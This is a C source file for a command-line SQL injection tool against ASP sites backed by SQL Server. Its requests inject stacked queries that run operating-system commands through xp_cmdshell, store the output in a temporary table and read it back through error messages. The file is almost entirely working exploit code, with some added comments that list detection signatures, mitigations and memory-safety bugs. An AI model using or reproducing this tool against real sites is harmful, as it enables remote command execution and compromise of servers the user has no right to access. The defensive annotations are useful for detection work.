
📄 sqlcmd.c

📁 asp网站sql注入有关命令执行之c、C++源码
#include <windows.h>
#include <winsock2.h>
#include <wininet.h>
#include <stdlib.h>
#pragma comment(lib, "wininet.lib")

/* File-scope settings shared by main() and ExecCommand().
 *   injurl - target URL, taken verbatim from argv[1] in main().
 *   type   - text appended right after injurl to close the original SQL
 *            literal ("" / "'" / "%'" depending on argv[2]).
 *   end    - text appended at the tail of the read-back query to re-balance
 *            the original statement.
 * Being file-scope pointers they start out NULL; main() only assigns type/end
 * when argv[2] parses to 0, 1 or 2. */
char *injurl,*type,*end;
/* Fetch `url` over WinINet and hand back the first chunk of the response body.
 *
 * Defender view: every request made here carries the fixed agent string
 * "SqlCMD" (first argument of InternetOpen), so that value in web-server or
 * proxy User-Agent logs is a direct indicator of this tool.
 *
 * NOTE(review): the function returns the address of the automatic array
 * `buffer`; the storage is gone once the function returns, so callers read a
 * dangling pointer (undefined behaviour).
 * NOTE(review): neither handle nor the InternetReadFile result is checked,
 * only one read of at most sizeof(buffer) bytes is performed, and the data is
 * never NUL-terminated although callers treat it as a C string. */
char *GetResult(char *url)
{
	char buffer[1024*8];
	DWORD dwBytesRead=0;
	HINTERNET hNet=InternetOpen("SqlCMD",PRE_CONFIG_INTERNET_ACCESS,NULL,INTERNET_INVALID_PORT_NUMBER,0);
	// INTERNET_FLAG_RELOAD: bypass the local cache so each query reaches the server.
	HINTERNET hUrlFile=InternetOpenUrl(hNet,url,NULL,0,INTERNET_FLAG_RELOAD,0);
	// bRead is stored but never inspected; dwBytesRead is likewise unused afterwards.
	BOOL bRead=InternetReadFile(hUrlFile,buffer,sizeof(buffer),&dwBytesRead);
	InternetCloseHandle(hUrlFile);
	InternetCloseHandle(hNet);
	return buffer;
}
/* Send `cmd` to the target through the injectable parameter and print the
 * rows that come back, one line per iteration.
 *
 * What the requests contain (all visible in the format strings below):
 *   1. A stacked batch that creates table [SIC_Tmp], inserts the output of
 *      MASTER..XP_CMDSHELL into it and then inserts the sentinel row
 *      '[g_over]'.
 *   2. Repeated "and (select top 1 ... )>0" probes that wrap row n of
 *      [SIC_Tmp] in '[CoolDiyer]' markers; the tool then searches the HTTP
 *      response for those markers. Presumably this depends on the application
 *      echoing the database error text to the client - confirm against the
 *      target's error handling.
 *   3. A final "DROP TABLE [SIC_Tmp]" once the sentinel row is read.
 *
 * Defender view: the literals "XP_CMDSHELL", "[SIC_Tmp]", "[CoolDiyer]" and
 * "[g_over]" appearing in request URLs or SQL Server traces are stable
 * signatures of this tool. The flow only works when the page concatenates the
 * parameter into SQL, allows stacked statements, returns detailed errors, and
 * the database login may run xp_cmdshell; parameterised queries, generic error
 * pages, a non-sysadmin application login and xp_cmdshell left disabled each
 * break it.
 *
 * NOTE(review): declared to return char * but every exit is a bare `return;`
 * and the loop never falls out; main() ignores the result.
 * NOTE(review): `response` points into GetResult()'s expired stack frame. */
char *ExecCommand(char *cmd)
{
	char url[1024],buff[1024],result[1024],*response,*p,*p1;
	int n=1,i,j;
	memset(url,0,sizeof(url));
	// Stage 1: run the command server-side and park its output in [SIC_Tmp].
	wsprintf(url,"%s%s;CREATE TABLE [SIC_Tmp]([id] int NOT NULL IDENTITY (1,1), [ResultTxt] nvarchar(4000) NULL);insert into [SIC_Tmp](ResultTxt) EXEC MASTER..XP_CMDSHELL '%s';insert into [SIC_Tmp] values ('[g_over]')--",injurl,type,cmd);
	response=GetResult(url);
    while(1){
	memset(buff,0,sizeof(buff));
	memset(result,0,sizeof(result));
	// Stage 2: ask for row n; "%%2B" becomes "%2B", the URL-encoded '+' used for
	// string concatenation in the query.
	wsprintf(url,"%s%s and (select top 1 case when ResultTxt is Null then '[CoolDiyer][CoolDiyer]' else '[CoolDiyer]'%%2BResultTxt%%2B'[CoolDiyer]' end from (select top %d id,ResultTxt from [SIC_Tmp] order by [id]) T order by [id] desc)>0%s",injurl,type,n,end);
	response=GetResult(url);
	// Locate the text between the first two markers (11 == strlen("[CoolDiyer]")).
	// NOTE(review): p1 is not checked; if the closing marker is missing it is NULL
	// and the length computed for strncpy below is meaningless.
	if(p=strstr(response,"[CoolDiyer]"))p1=strstr(p+11,"[CoolDiyer]");
		else {
				puts("Cann't Injection It");
				return;
		}
	// NOTE(review): the copy length comes from the response, not from sizeof(buff).
	strncpy(buff,p+11,p1-p-11);
	// Sentinel row reached: remove the temporary table and stop.
	if (!strcmp(buff,"[g_over]")){
		wsprintf(url,"%s%s;DROP TABLE [SIC_Tmp]--",injurl,type);
		GetResult(url);
		return;
	}
	// Undo the HTML entity encoding found in the page: &lt; -> '<', &gt; -> '>',
	// &quot; -> '"'; every other byte is copied unchanged.
	for(i=0,j=0;i<strlen(buff);i++,j++){
		if(buff[i]=='&' && buff[i+2]=='t' && buff[i+3]==';'){
			if (buff[i+1]=='l')result[j]='<';
			if (buff[i+1]=='g')result[j]='>';
			i+=3;
		}
		else if(buff[i]=='&' && buff[i+1]=='q' && buff[i+2]=='u' && buff[i+3]=='o' && buff[i+4]=='t' && buff[i+5]==';'){
			result[j]='"';
			i+=5;
		}
			else result[j]=buff[i];
		}
	puts(result);
	memset(url,0,sizeof(url));
	n++;	// next probe asks for the following row of [SIC_Tmp]
	}
}
/* Entry point: print the banner, require exactly two arguments (<InjURL> and
 * <type>), derive the quoting prefix/suffix from <type>, then read commands
 * from stdin and pass each one to ExecCommand() until "exit" is typed
 * (compared case-insensitively via strcmpi).
 *
 * NOTE(review): `void main` is not a standard signature.
 * NOTE(review): gets() reads an unbounded line into cmd[1024].
 * NOTE(review): atoi() yields 0 for non-numeric text, so such input is treated
 * as type 0; any other integer leaves `type` and `end` as NULL, which
 * ExecCommand() then passes to wsprintf "%s". */
void main(int argc,char **argv)
{
	char cmd[1024];
		printf("=[Sql Inj CMD]======================================================\n");
		printf("\tSQL Injection Command Exploit Powered By CoolDiyer\n\n");
		if(argc!=3){
		printf("\tUsage:  sqlcmd.exe <InjURL> <type>\n");
		printf("\t\tType:\t0->Number    1->char    2->Search\n");
		printf("\tExample:\n\t\tsqlcmd.exe http://localhost/index.asp?id=1 0\n");
		printf("=05-12-22===========================================================\n");
		return;
	}
	injurl=argv[1];
	// type 0: parameter is used unquoted in the original query, nothing to close.
	if(atoi(argv[2])==0){
		type="";
		end="";
	}
	// type 1: parameter sits inside a quoted string literal.
	if(atoi(argv[2])==1){
		type="'";
		end=" and ''='";
	}
	// type 2: parameter sits inside a quoted pattern ending in '%' (the usage
	// text calls this "Search").
	if(atoi(argv[2])==2){
		type="%'";
		end=" and '%'='";
	}
	while (1)
	{
	printf("Sql Inj CMD>");
	gets(cmd);
	if (!strcmpi(cmd,"exit"))return;
	ExecCommand(cmd);
	}
}
